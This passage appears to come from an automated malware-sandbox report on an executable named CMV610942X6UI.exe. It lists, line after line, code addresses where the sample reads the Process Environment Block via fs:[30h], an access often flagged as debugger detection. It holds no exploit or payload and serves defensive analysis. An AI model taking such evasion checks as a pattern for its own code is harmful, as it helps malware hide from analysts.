            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01006500 mov eax, dword ptr fs:[00000030h]3_2_01006500
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01044500 mov eax, dword ptr fs:[00000030h]3_2_01044500
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01044500 mov eax, dword ptr fs:[00000030h]3_2_01044500
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01044500 mov eax, dword ptr fs:[00000030h]3_2_01044500
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01044500 mov eax, dword ptr fs:[00000030h]3_2_01044500
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01044500 mov eax, dword ptr fs:[00000030h]3_2_01044500
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01044500 mov eax, dword ptr fs:[00000030h]3_2_01044500
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01044500 mov eax, dword ptr fs:[00000030h]3_2_01044500
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F704E5 mov ecx, dword ptr fs:[00000030h]3_2_00F704E5
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FA44B0 mov ecx, dword ptr fs:[00000030h]3_2_00FA44B0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FFA4B0 mov eax, dword ptr fs:[00000030h]3_2_00FFA4B0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F764AB mov eax, dword ptr fs:[00000030h]3_2_00F764AB
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F9A470 mov eax, dword ptr fs:[00000030h]3_2_00F9A470
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F9A470 mov eax, dword ptr fs:[00000030h]3_2_00F9A470
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F9A470 mov eax, dword ptr fs:[00000030h]3_2_00F9A470
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FFC460 mov ecx, dword ptr fs:[00000030h]3_2_00FFC460
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F9245A mov eax, dword ptr fs:[00000030h]3_2_00F9245A
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F6645D mov eax, dword ptr fs:[00000030h]3_2_00F6645D
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FAE443 mov eax, dword ptr fs:[00000030h]3_2_00FAE443
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FAE443 mov eax, dword ptr fs:[00000030h]3_2_00FAE443
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FAE443 mov eax, dword ptr fs:[00000030h]3_2_00FAE443
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FAE443 mov eax, dword ptr fs:[00000030h]3_2_00FAE443
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FAE443 mov eax, dword ptr fs:[00000030h]3_2_00FAE443
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FAE443 mov eax, dword ptr fs:[00000030h]3_2_00FAE443
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FAE443 mov eax, dword ptr fs:[00000030h]3_2_00FAE443
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FAE443 mov eax, dword ptr fs:[00000030h]3_2_00FAE443
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FAA430 mov eax, dword ptr fs:[00000030h]3_2_00FAA430
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F6C427 mov eax, dword ptr fs:[00000030h]3_2_00F6C427
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F6E420 mov eax, dword ptr fs:[00000030h]3_2_00F6E420
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F6E420 mov eax, dword ptr fs:[00000030h]3_2_00F6E420
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F6E420 mov eax, dword ptr fs:[00000030h]3_2_00F6E420
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF6420 mov eax, dword ptr fs:[00000030h]3_2_00FF6420
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF6420 mov eax, dword ptr fs:[00000030h]3_2_00FF6420
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF6420 mov eax, dword ptr fs:[00000030h]3_2_00FF6420
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF6420 mov eax, dword ptr fs:[00000030h]3_2_00FF6420
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF6420 mov eax, dword ptr fs:[00000030h]3_2_00FF6420
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF6420 mov eax, dword ptr fs:[00000030h]3_2_00FF6420
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF6420 mov eax, dword ptr fs:[00000030h]3_2_00FF6420
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FA8402 mov eax, dword ptr fs:[00000030h]3_2_00FA8402
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FA8402 mov eax, dword ptr fs:[00000030h]3_2_00FA8402
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FA8402 mov eax, dword ptr fs:[00000030h]3_2_00FA8402
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F725E0 mov eax, dword ptr fs:[00000030h]3_2_00F725E0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FAC5ED mov eax, dword ptr fs:[00000030h]3_2_00FAC5ED
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FAC5ED mov eax, dword ptr fs:[00000030h]3_2_00FAC5ED
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F9E5E7 mov eax, dword ptr fs:[00000030h]3_2_00F9E5E7
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F9E5E7 mov eax, dword ptr fs:[00000030h]3_2_00F9E5E7
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F9E5E7 mov eax, dword ptr fs:[00000030h]3_2_00F9E5E7
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F9E5E7 mov eax, dword ptr fs:[00000030h]3_2_00F9E5E7
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F9E5E7 mov eax, dword ptr fs:[00000030h]3_2_00F9E5E7
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F9E5E7 mov eax, dword ptr fs:[00000030h]3_2_00F9E5E7
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F9E5E7 mov eax, dword ptr fs:[00000030h]3_2_00F9E5E7
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F9E5E7 mov eax, dword ptr fs:[00000030h]3_2_00F9E5E7
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F765D0 mov eax, dword ptr fs:[00000030h]3_2_00F765D0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FAA5D0 mov eax, dword ptr fs:[00000030h]3_2_00FAA5D0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FAA5D0 mov eax, dword ptr fs:[00000030h]3_2_00FAA5D0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FAE5CF mov eax, dword ptr fs:[00000030h]3_2_00FAE5CF
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FAE5CF mov eax, dword ptr fs:[00000030h]3_2_00FAE5CF
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F945B1 mov eax, dword ptr fs:[00000030h]3_2_00F945B1
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F945B1 mov eax, dword ptr fs:[00000030h]3_2_00F945B1
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0102A456 mov eax, dword ptr fs:[00000030h]3_2_0102A456
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF05A7 mov eax, dword ptr fs:[00000030h]3_2_00FF05A7
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF05A7 mov eax, dword ptr fs:[00000030h]3_2_00FF05A7
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF05A7 mov eax, dword ptr fs:[00000030h]3_2_00FF05A7
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FAE59C mov eax, dword ptr fs:[00000030h]3_2_00FAE59C
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FA4588 mov eax, dword ptr fs:[00000030h]3_2_00FA4588
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F72582 mov eax, dword ptr fs:[00000030h]3_2_00F72582
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F72582 mov ecx, dword ptr fs:[00000030h]3_2_00F72582
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FA656A mov eax, dword ptr fs:[00000030h]3_2_00FA656A
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FA656A mov eax, dword ptr fs:[00000030h]3_2_00FA656A
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FA656A mov eax, dword ptr fs:[00000030h]3_2_00FA656A
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0102A49A mov eax, dword ptr fs:[00000030h]3_2_0102A49A
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F78550 mov eax, dword ptr fs:[00000030h]3_2_00F78550
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F78550 mov eax, dword ptr fs:[00000030h]3_2_00F78550
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F9E53E mov eax, dword ptr fs:[00000030h]3_2_00F9E53E
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F9E53E mov eax, dword ptr fs:[00000030h]3_2_00F9E53E
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F9E53E mov eax, dword ptr fs:[00000030h]3_2_00F9E53E
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F9E53E mov eax, dword ptr fs:[00000030h]3_2_00F9E53E
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F9E53E mov eax, dword ptr fs:[00000030h]3_2_00F9E53E
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F80535 mov eax, dword ptr fs:[00000030h]3_2_00F80535
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F80535 mov eax, dword ptr fs:[00000030h]3_2_00F80535
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F80535 mov eax, dword ptr fs:[00000030h]3_2_00F80535
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F80535 mov eax, dword ptr fs:[00000030h]3_2_00F80535
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F80535 mov eax, dword ptr fs:[00000030h]3_2_00F80535
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F80535 mov eax, dword ptr fs:[00000030h]3_2_00F80535
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FEE6F2 mov eax, dword ptr fs:[00000030h]3_2_00FEE6F2
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FEE6F2 mov eax, dword ptr fs:[00000030h]3_2_00FEE6F2
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FEE6F2 mov eax, dword ptr fs:[00000030h]3_2_00FEE6F2
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FEE6F2 mov eax, dword ptr fs:[00000030h]3_2_00FEE6F2
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF06F1 mov eax, dword ptr fs:[00000030h]3_2_00FF06F1
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF06F1 mov eax, dword ptr fs:[00000030h]3_2_00FF06F1
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FAA6C7 mov ebx, dword ptr fs:[00000030h]3_2_00FAA6C7
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FAA6C7 mov eax, dword ptr fs:[00000030h]3_2_00FAA6C7
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FA66B0 mov eax, dword ptr fs:[00000030h]3_2_00FA66B0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FAC6A6 mov eax, dword ptr fs:[00000030h]3_2_00FAC6A6
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F74690 mov eax, dword ptr fs:[00000030h]3_2_00F74690
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F74690 mov eax, dword ptr fs:[00000030h]3_2_00F74690
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FA2674 mov eax, dword ptr fs:[00000030h]3_2_00FA2674
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0101678E mov eax, dword ptr fs:[00000030h]3_2_0101678E
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FAA660 mov eax, dword ptr fs:[00000030h]3_2_00FAA660
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FAA660 mov eax, dword ptr fs:[00000030h]3_2_00FAA660
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_010247A0 mov eax, dword ptr fs:[00000030h]3_2_010247A0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F8C640 mov eax, dword ptr fs:[00000030h]3_2_00F8C640
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FA6620 mov eax, dword ptr fs:[00000030h]3_2_00FA6620
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FA8620 mov eax, dword ptr fs:[00000030h]3_2_00FA8620
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F7262C mov eax, dword ptr fs:[00000030h]3_2_00F7262C
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F8E627 mov eax, dword ptr fs:[00000030h]3_2_00F8E627
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FB2619 mov eax, dword ptr fs:[00000030h]3_2_00FB2619
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F8260B mov eax, dword ptr fs:[00000030h]3_2_00F8260B
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F8260B mov eax, dword ptr fs:[00000030h]3_2_00F8260B
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F8260B mov eax, dword ptr fs:[00000030h]3_2_00F8260B
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F8260B mov eax, dword ptr fs:[00000030h]3_2_00F8260B
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F8260B mov eax, dword ptr fs:[00000030h]3_2_00F8260B
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F8260B mov eax, dword ptr fs:[00000030h]3_2_00F8260B
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F8260B mov eax, dword ptr fs:[00000030h]3_2_00F8260B
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FEE609 mov eax, dword ptr fs:[00000030h]3_2_00FEE609
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F747FB mov eax, dword ptr fs:[00000030h]3_2_00F747FB
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F747FB mov eax, dword ptr fs:[00000030h]3_2_00F747FB
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F927ED mov eax, dword ptr fs:[00000030h]3_2_00F927ED
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F927ED mov eax, dword ptr fs:[00000030h]3_2_00F927ED
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F927ED mov eax, dword ptr fs:[00000030h]3_2_00F927ED
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FFE7E1 mov eax, dword ptr fs:[00000030h]3_2_00FFE7E1
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F7C7C0 mov eax, dword ptr fs:[00000030h]3_2_00F7C7C0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF07C3 mov eax, dword ptr fs:[00000030h]3_2_00FF07C3
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F707AF mov eax, dword ptr fs:[00000030h]3_2_00F707AF
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0103866E mov eax, dword ptr fs:[00000030h]3_2_0103866E
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0103866E mov eax, dword ptr fs:[00000030h]3_2_0103866E
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F78770 mov eax, dword ptr fs:[00000030h]3_2_00F78770
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F80770 mov eax, dword ptr fs:[00000030h]3_2_00F80770
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F80770 mov eax, dword ptr fs:[00000030h]3_2_00F80770
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F80770 mov eax, dword ptr fs:[00000030h]3_2_00F80770
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F80770 mov eax, dword ptr fs:[00000030h]3_2_00F80770
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F80770 mov eax, dword ptr fs:[00000030h]3_2_00F80770
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F80770 mov eax, dword ptr fs:[00000030h]3_2_00F80770
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F80770 mov eax, dword ptr fs:[00000030h]3_2_00F80770
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F80770 mov eax, dword ptr fs:[00000030h]3_2_00F80770
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F80770 mov eax, dword ptr fs:[00000030h]3_2_00F80770
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F80770 mov eax, dword ptr fs:[00000030h]3_2_00F80770
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F80770 mov eax, dword ptr fs:[00000030h]3_2_00F80770
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F80770 mov eax, dword ptr fs:[00000030h]3_2_00F80770
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FFE75D mov eax, dword ptr fs:[00000030h]3_2_00FFE75D
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F70750 mov eax, dword ptr fs:[00000030h]3_2_00F70750
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF4755 mov eax, dword ptr fs:[00000030h]3_2_00FF4755
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FB2750 mov eax, dword ptr fs:[00000030h]3_2_00FB2750
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FB2750 mov eax, dword ptr fs:[00000030h]3_2_00FB2750
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FA674D mov esi, dword ptr fs:[00000030h]3_2_00FA674D
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FA674D mov eax, dword ptr fs:[00000030h]3_2_00FA674D
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FA674D mov eax, dword ptr fs:[00000030h]3_2_00FA674D
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FA273C mov eax, dword ptr fs:[00000030h]3_2_00FA273C
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FA273C mov ecx, dword ptr fs:[00000030h]3_2_00FA273C
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FA273C mov eax, dword ptr fs:[00000030h]3_2_00FA273C
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FEC730 mov eax, dword ptr fs:[00000030h]3_2_00FEC730
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FAC720 mov eax, dword ptr fs:[00000030h]3_2_00FAC720
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FAC720 mov eax, dword ptr fs:[00000030h]3_2_00FAC720
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F70710 mov eax, dword ptr fs:[00000030h]3_2_00F70710
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FA0710 mov eax, dword ptr fs:[00000030h]3_2_00FA0710
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FAC700 mov eax, dword ptr fs:[00000030h]3_2_00FAC700
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FAC8F9 mov eax, dword ptr fs:[00000030h]3_2_00FAC8F9
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FAC8F9 mov eax, dword ptr fs:[00000030h]3_2_00FAC8F9
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0100892B mov eax, dword ptr fs:[00000030h]3_2_0100892B
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F9E8C0 mov eax, dword ptr fs:[00000030h]3_2_00F9E8C0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FFC89D mov eax, dword ptr fs:[00000030h]3_2_00FFC89D
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F70887 mov eax, dword ptr fs:[00000030h]3_2_00F70887
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01014978 mov eax, dword ptr fs:[00000030h]3_2_01014978
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01014978 mov eax, dword ptr fs:[00000030h]3_2_01014978
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FFE872 mov eax, dword ptr fs:[00000030h]3_2_00FFE872
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FFE872 mov eax, dword ptr fs:[00000030h]3_2_00FFE872
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F74859 mov eax, dword ptr fs:[00000030h]3_2_00F74859
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F74859 mov eax, dword ptr fs:[00000030h]3_2_00F74859
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FA0854 mov eax, dword ptr fs:[00000030h]3_2_00FA0854
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F82840 mov ecx, dword ptr fs:[00000030h]3_2_00F82840
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_010069C0 mov eax, dword ptr fs:[00000030h]3_2_010069C0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FAA830 mov eax, dword ptr fs:[00000030h]3_2_00FAA830
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F92835 mov eax, dword ptr fs:[00000030h]3_2_00F92835
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F92835 mov eax, dword ptr fs:[00000030h]3_2_00F92835
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F92835 mov eax, dword ptr fs:[00000030h]3_2_00F92835
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F92835 mov ecx, dword ptr fs:[00000030h]3_2_00F92835
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F92835 mov eax, dword ptr fs:[00000030h]3_2_00F92835
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F92835 mov eax, dword ptr fs:[00000030h]3_2_00F92835
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0103A9D3 mov eax, dword ptr fs:[00000030h]3_2_0103A9D3
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FFC810 mov eax, dword ptr fs:[00000030h]3_2_00FFC810
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FA29F9 mov eax, dword ptr fs:[00000030h]3_2_00FA29F9
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FA29F9 mov eax, dword ptr fs:[00000030h]3_2_00FA29F9
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FFE9E0 mov eax, dword ptr fs:[00000030h]3_2_00FFE9E0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F7A9D0 mov eax, dword ptr fs:[00000030h]3_2_00F7A9D0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F7A9D0 mov eax, dword ptr fs:[00000030h]3_2_00F7A9D0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F7A9D0 mov eax, dword ptr fs:[00000030h]3_2_00F7A9D0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F7A9D0 mov eax, dword ptr fs:[00000030h]3_2_00F7A9D0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F7A9D0 mov eax, dword ptr fs:[00000030h]3_2_00F7A9D0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F7A9D0 mov eax, dword ptr fs:[00000030h]3_2_00F7A9D0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FA49D0 mov eax, dword ptr fs:[00000030h]3_2_00FA49D0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0101483A mov eax, dword ptr fs:[00000030h]3_2_0101483A
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0101483A mov eax, dword ptr fs:[00000030h]3_2_0101483A
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF89B3 mov esi, dword ptr fs:[00000030h]3_2_00FF89B3
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF89B3 mov eax, dword ptr fs:[00000030h]3_2_00FF89B3
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF89B3 mov eax, dword ptr fs:[00000030h]3_2_00FF89B3
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F829A0 mov eax, dword ptr fs:[00000030h]3_2_00F829A0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F829A0 mov eax, dword ptr fs:[00000030h]3_2_00F829A0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F829A0 mov eax, dword ptr fs:[00000030h]3_2_00F829A0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F829A0 mov eax, dword ptr fs:[00000030h]3_2_00F829A0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F829A0 mov eax, dword ptr fs:[00000030h]3_2_00F829A0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F829A0 mov eax, dword ptr fs:[00000030h]3_2_00F829A0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F829A0 mov eax, dword ptr fs:[00000030h]3_2_00F829A0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F829A0 mov eax, dword ptr fs:[00000030h]3_2_00F829A0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F829A0 mov eax, dword ptr fs:[00000030h]3_2_00F829A0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F829A0 mov eax, dword ptr fs:[00000030h]3_2_00F829A0
